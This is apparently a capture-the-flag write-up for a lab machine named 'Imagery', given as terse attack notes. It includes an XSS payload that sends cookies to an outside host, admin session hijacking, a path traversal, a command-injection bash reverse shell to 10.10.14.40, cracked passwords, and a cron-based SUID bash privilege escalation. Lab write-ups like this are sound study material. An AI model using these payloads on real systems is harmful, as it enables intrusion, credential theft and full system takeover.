[Profile]{
Machine: Imagery 
ip: 10.129.97.113 / 10.129.97.147
}

[Enumeration]{
ima.nmap
  |- Server: Werkzeug/3.1.3 Python/3.12.7 --> :8000
                |- CVE-2024-34069 *
  |- Image Gallery
  |- FourOhFourRequest
  |- GetRequest
  |- static/tailwind.js
  |- static/fonts.css
  |- static/purify.min.js

/uploads/filename
        |_ /uploads/7e64bfd2-0805-464f-a642-31d033d27ecd_test.jpeg

- try to deobfuscate those js files.. *
- file upload injection execution through image to get reverse shell *

}

[Exploitation]{
XSS via Bug Report
<img src=1 onerror="document.location='http://10.10.14.40/steal/'+document.cookie">

.eJw9jbEOgzAMRP_Fc4UEZcpER74iMolLLSUGxc6AEP-Ooqod793T3QmRdU94zBEcYL8M4RlHeADrK2YWcFYqteg571R0EzSW1RupVaUC7o1Jv8aPeQxhq2L_rkHBTO2irU6ccaVydB9b4LoBKrMv2w.aXHrxw.y4sqryAd3h4bVx8J59aSn_Sgd-I

Then we hijacked the Admin Session through the admin cookie.

admin@imagery.htb (Admin)
ID:a1b2c3d4

testuser@imagery.htb
ID:e5f6g7h8

Path Traversal:
http://10.129.97.147:8000/admin/get_system_log?log_identifier=testuser%40imagery.htb.log

download important files through it: ../api_edit.py ../db.json

db.json --> admin and testuser password hashes md5
testuser pswd --> iambatman

Craft the payload for the transform functions --> crop; 
 |-"`; bash -c 'bash -i >& /dev/tcp/10.10.14.40/7777 0>&1'
modify x by ";cmd;"

Got a reverse shell !

/var/backup/web_20250806_120723.zip.aes

Crack the aes password by brute force --> crackAES.py
  |-> Password found: bestfriends

decrypt it --> decryptAES.py

unzip the zip 
and check it !
  |--> mark
        |-->md5 hash password --cracked--> supersmash

Let's try ssh it !
Permission denied( publickey )

su mark
}

[PrivEsc]{
su mark

got the user.txt --> c95b3e94675b4b2250e3b956d0055b87

sudo -l --> /usr/local/charcol
                |--> sudo /usr/local/charcol -R // to reset password / to no password
   sudo charcol shell 
          \-> help
            \-> auto  add --schedule "* * * * *" --name pwn --command "chmod +s /bin/bash"

then /bin/bash -p ( to keep the SUID )
        |--> now root

got the root.txt --> 4f50c0a8bd3d687693b10c9cf9bc81b4

pwned(!_!)

}
